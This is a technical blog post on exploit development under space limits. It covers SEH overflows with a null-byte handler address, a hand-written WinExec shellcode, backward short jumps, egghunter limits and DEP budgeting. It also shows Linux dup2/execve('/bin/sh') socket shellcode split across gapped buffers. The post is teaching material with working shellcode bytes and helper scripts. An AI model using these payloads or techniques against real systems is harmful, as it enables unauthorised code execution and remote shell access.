Shellcode Under Constraints · Steven Foerster

Real-world exploit development rarely offers the luxury of a 500-byte contiguous buffer with no bad characters. More often you’re working within tight limits — a 68-byte window, a null byte that truncates your payload, or a firewall that blocks your reverse shell. These constraints force creative solutions.

The Null Byte Problem in SafeSEH Bypass

When exploiting an SEH overflow on Windows, you need a POP POP RET gadget (or an equivalent such as CALL DWORD PTR [EBP+30]) at an address that SafeSEH will not reject. Sometimes the only viable candidate has a null byte in its address:

Found CALL DWORD PTR SS:[EBP+30] at 0x00280B0B [none] ** Null byte ** PAGE_READONLY

The high-order byte of 0x00280B0B is null. Packed little-endian, the address becomes \x0b\x0b\x28\x00, so the null byte comes last. strcpy and similar functions copy up to and including the first null, which means the full address is written but nothing after it reaches the buffer.
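The truncation can be confirmed offline before touching a debugger. The sketch below packs the address with Python’s struct module and mimics what a strcpy-style copy would keep. The helper c_string_copy and the filler sizes are hypothetical, chosen only for illustration.

```python
import struct

def c_string_copy(src: bytes) -> bytes:
    """Mimic strcpy: keep everything up to and including the first null byte."""
    end = src.find(b"\x00")
    return src if end == -1 else src[: end + 1]

seh = struct.pack("<I", 0x00280B0B)   # little-endian: low-order byte first

# Illustrative filler only: 64 bytes of junk, 4-byte nSEH, SEH, trailing data.
payload = b"A" * 64 + b"BBBB" + seh + b"C" * 50

copied = c_string_copy(payload)
print(seh.hex())                   # 0b0b2800
print(len(payload), len(copied))   # 122 72
```

None of the trailing C bytes survive the copy, which is why anything placed after the handler address is lost.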

This has a cascading effect on payload design:

Normal SEH exploit layout:
| Junk | nSEH (jmp) | SEH (POP POP RET) | NOP sled | Shellcode |
  N bytes    4 bytes       4 bytes           ~50 B      ~300 B

With null byte in SEH address:
| Junk | nSEH (jmp) | SEH (POP POP RET\x00) |  ← everything stops here
  N bytes    4 bytes       4 bytes

The shellcode must go before the SEH overwrite, not after. With the SEH handler at offset 68, that gives you approximately 68 bytes for the entire payload: NOP sled, shellcode, and all.

Hand-Crafted Shellcode for Tight Spaces

With ~68 bytes, msfvenom’s encoded output (typically 200+ bytes) won’t fit. You need hand-crafted, minimal shellcode.

WinExec in Under 30 Bytes

A minimal WinExec("calc.exe", 1) shellcode:

sc = b"\x90"                            # NOP (landing pad)
sc += b"\x33\xDB"                       # xor ebx, ebx
sc += b"\x53"                           # push ebx (null terminator)
sc += b"\x68\x2e\x65\x78\x65"          # push ".exe"
sc += b"\x68\x63\x61\x6c\x63"          # push "calc"
sc += b"\x8B\xCC"                       # mov ecx, esp (ptr to "calc.exe")
sc += b"\x6A\x01"                       # push 1 (SW_SHOWNORMAL)
sc += b"\x51"                           # push ecx (lpCmdLine)
sc += b"\xBB\xAD\x23\x86\x7C"          # mov ebx, 0x7C8623AD (WinExec addr)
sc += b"\xFF\xD3"                       # call ebx

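Every byte is accounted for: no encoder, no function-resolution stub, no room for error. The listing totals 26 bytes, including the leading NOP. The WinExec address (0x7C8623AD) is hard-coded, so it is only valid for the specific kernel32.dll build on the target. Obtain it by resolving it with arwin, from the debugger’s Assemble window, or with a mona search: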

!mona find -s "Call kernel32.WinExec"
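Before committing to a layout, it helps to check the byte count and bad characters mechanically. The following is a minimal sketch: check_payload is a hypothetical helper, and the 60-byte limit assumes the 68-byte window minus the 4-byte nSEH and 4-byte SEH fields.

```python
def check_payload(data: bytes, limit: int, badchars: bytes = b"\x00") -> list:
    """Return a list of problems; an empty list means the payload is acceptable."""
    problems = []
    if len(data) > limit:
        problems.append(f"{len(data)} bytes exceeds limit of {limit}")
    for offset, byte in enumerate(data):
        if byte in badchars:
            problems.append(f"bad char 0x{byte:02x} at offset {offset}")
    return problems

# Same bytes as the WinExec listing above, joined into one literal.
sc = (
    b"\x90" b"\x33\xDB" b"\x53"
    b"\x68\x2e\x65\x78\x65" b"\x68\x63\x61\x6c\x63"
    b"\x8B\xCC" b"\x6A\x01" b"\x51"
    b"\xBB\xAD\x23\x86\x7C" b"\xFF\xD3"
)

print(len(sc))                      # 26
print(check_payload(sc, limit=60))  # []
```

A different WinExec address could contain a null or another bad character, so the check is worth rerunning whenever the hard-coded address changes.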

The Budget

With this shellcode occupying ~30 bytes, the remaining ~38 bytes of the 68-byte window go to the NOP sled, nSEH, and SEH:

| NOP sled (~22 B) | Shellcode (~30 B) | nSEH (4 B) | SEH (4 B) | \x00 (truncated) |
      ↑                                      ↑
   Landing zone                          Short jmp back

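nSEH contains a short jump backwards (\xeb\xd2\x90\x90) to land in the NOP sled before the shellcode. As a signed byte, 0xd2 is -46, and the displacement is measured from the end of the 2-byte jump, so execution resumes 44 bytes before the start of nSEH. The two trailing \x90 bytes only pad nSEH to 4 bytes. It’s tight, but it works.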
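The landing point of that backward jump can be checked with a few lines of arithmetic. This is a sketch under stated assumptions: short_jmp_target is a hypothetical helper, nSEH is assumed to start at offset 60 (a 68-byte window minus nSEH and SEH), and the sled is assumed to be the ~22 bytes shown in the layout.

```python
import struct

def short_jmp_target(jmp_offset: int, instr: bytes) -> int:
    """Return the buffer offset that a 2-byte short jmp (EB rel8) lands on."""
    if len(instr) < 2 or instr[0] != 0xEB:
        raise ValueError("not a short jmp")
    rel8 = struct.unpack("b", instr[1:2])[0]   # signed 8-bit displacement
    return jmp_offset + 2 + rel8               # relative to the next instruction

NSEH_OFFSET = 60   # assumption: 68-byte window minus 4-byte nSEH and 4-byte SEH
SLED_LEN = 22      # assumption: sled length taken from the layout above

target = short_jmp_target(NSEH_OFFSET, b"\xeb\xd2\x90\x90")
print(target)                   # 16
print(0 <= target < SLED_LEN)   # True
```

If the real nSEH offset differs, only NSEH_OFFSET changes; the check still shows whether the jump lands inside the sled.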

When Egghunters Don’t Save You

An egghunter is usually the answer for small buffers: place a ~32-byte egghunter in the limited space and the full shellcode elsewhere in memory. But this requires two things:

A second input vector to place the larger shellcode somewhere in the process’s address space (another field, a socket recv, a file read, an environment variable)
Enough space for the egghunter itself plus the SEH/nSEH overhead

If either condition is not met (for example, a local file-based exploit with a single input and only 68 bytes of controlled space), the egghunter approach doesn’t help. You’re stuck fitting everything in the primary buffer.

The Constraint Cascade

When multiple mitigations combine with limited space, the constraints compound:

| Mitigation                 | Space Cost                      | Effect                           |
| SafeSEH bypass (null byte) | Lose everything after offset 68 | Shellcode must precede SEH       |
| nSEH short jump            | 4 bytes                         | Eats into buffer                 |
| SEH handler address        | 4 bytes                         | Eats into buffer                 |
| DEP                        | Need ROP chain (~60+ bytes)     | Won’t fit in remaining ~60 bytes |

Adding DEP to the mix makes this configuration effectively unexploitable with the available gadgets. A ROP chain to bypass DEP typically needs 60-100+ bytes, and there’s no room alongside the shellcode. Recognizing this dead end early saves time.
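The dead end shows up quickly when the budget is written down as arithmetic. The sketch below uses a hypothetical Budget class. The figures are the approximate ones from the table, with 60 bytes taken as the low end of the ROP chain estimate.

```python
from dataclasses import dataclass

@dataclass
class Budget:
    window: int     # bytes that survive the copy, nSEH and SEH included
    nseh: int = 4   # short jump field
    seh: int = 4    # handler address field

    def free(self) -> int:
        """Bytes left for sled, shellcode, and anything else."""
        return self.window - self.nseh - self.seh

    def fits(self, *parts: int) -> bool:
        """True if the given component sizes fit in the free space."""
        return sum(parts) <= self.free()

budget = Budget(window=68)
print(budget.free())         # 60
print(budget.fits(30))       # True: shellcode alone
print(budget.fits(30, 60))   # False: shellcode plus a minimal ROP chain
```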

Splitting Shellcode Across Gaps

When the buffer is large enough overall but not contiguous, shellcode can be divided into independent chunks connected by short jumps.

Consider a remote service where strcpy writes to buffers spaced 0x40 bytes apart in memory:

0xf74005d0: [chunk 1 -- 36 bytes usable]
0xf74005f0: [gap -- zeroed memory]
0xf7400610: [chunk 2 -- 36 bytes usable]
0xf7400630: [gap -- zeroed memory]
0xf7400650: [chunk 3 -- 36 bytes usable]

Each chunk ends with a short jump (\xeb\x2a) to skip the gap and land at the start of the next chunk:

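# Chunk 1: dup2 loop (redirect fd 0,1,2 to socket)
# ecx is assumed to hold 3 on entry; that setup is not shown in this excerpt
chunk1  = b"\x31\xc0"              # xor eax, eax
chunk1 += b"\x31\xdb"              # xor ebx, ebx
chunk1 += b"\x80\xc3\x04"          # add bl, 4 (socket fd)
chunk1 += b"\xb0\x3f"              # loop: mov al, 0x3f (dup2 syscall number)
chunk1 += b"\x49\xcd\x80"          # dec ecx; int 0x80 -> dup2(ebx, ecx)
chunk1 += b"\x85\xc0\x75\xf7"      # test eax, eax; jnz loop (exits once dup2 returns 0)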
chunk1 += b"\xeb\x2a"              # short jump → chunk 2

# Chunk 2: execve("/bin/sh")
chunk2  = b"\x50"                  # push eax (null)
chunk2 += b"\x68\x2f\x2f\x73\x68"  # push "//sh"
chunk2 += b"\x68\x2f\x62\x69\x6e"  # push "/bin"
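chunk2 += b"\x89\xe3"              # mov ebx, esp (ptr to "/bin//sh")
chunk2 += b"\x50\x53"              # push eax; push ebx (argv = [ptr, NULL])
chunk2 += b"\x89\xe1\x99"          # mov ecx, esp (argv); cdq (edx = 0, envp)
chunk2 += b"\xb0\x0b\xcd\x80"      # mov al, 0x0b (execve); int 0x80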

The key rule: split at points with no cross-boundary jumps. The dup2 loop’s jnz jumps backwards within chunk 1, which is fine. The \xeb\x2a at the end is the only forward jump, and it targets the start of chunk 2.

Calculating Jump Distances

The short jump instruction \xeb\xNN treats NN as a signed 8-bit displacement (-128 to +127) measured from the instruction after the jump, since the CPU has already advanced past the 2-byte instruction by the time the displacement is applied:

Jump instruction at: 0xf74005e8 (\xeb\x2a, 2 bytes)
Next instruction:    0xf74005ea (this is where the offset is measured from)
Chunk 2 starts at:   0xf7400614
Distance:            0x614 - 0x5ea = 0x2a (42 bytes)

So \xeb\x2a is correct. Always verify with GDB — off-by-one errors here mean jumping into the middle of an instruction or into the zeroed gap.
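The same calculation can be scripted so the jump bytes are derived rather than typed by hand. This is a small sketch: short_jmp is a hypothetical helper, and it assumes the jump opcode itself sits at 0xf74005e8, two bytes before the next-instruction address given above.

```python
def short_jmp(src: int, dst: int) -> bytes:
    """Encode a 2-byte short jmp located at src that lands on dst."""
    rel = dst - (src + 2)   # measured from the instruction after the jmp
    if not -128 <= rel <= 127:
        raise ValueError(f"displacement {rel} does not fit in rel8")
    return bytes([0xEB, rel & 0xFF])

print(short_jmp(0xF74005E8, 0xF7400614).hex())   # eb2a
```

The range check also catches a gap that is too wide for a short jump. The result should still be confirmed in GDB against the real addresses.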

General Principles

Know your byte budget — Before writing any shellcode, map out exactly how many bytes are available and where they can go
Hand-craft when space is tight — Encoders and generators add overhead; manual assembly can save 50-70% of the space
Null bytes cascade — A single null byte in a critical address can reshape the entire exploit layout
Mitigations compound — Each protection eats into your available space; combinations can be unexploitable with a given approach
Recognize dead ends — If the math doesn’t add up (ROP chain + shellcode > available space), pivot to a different strategy rather than forcing it
Short jumps bridge gaps — Discontinuous buffers are workable as long as the gaps are within 127 bytes and the shellcode splits cleanly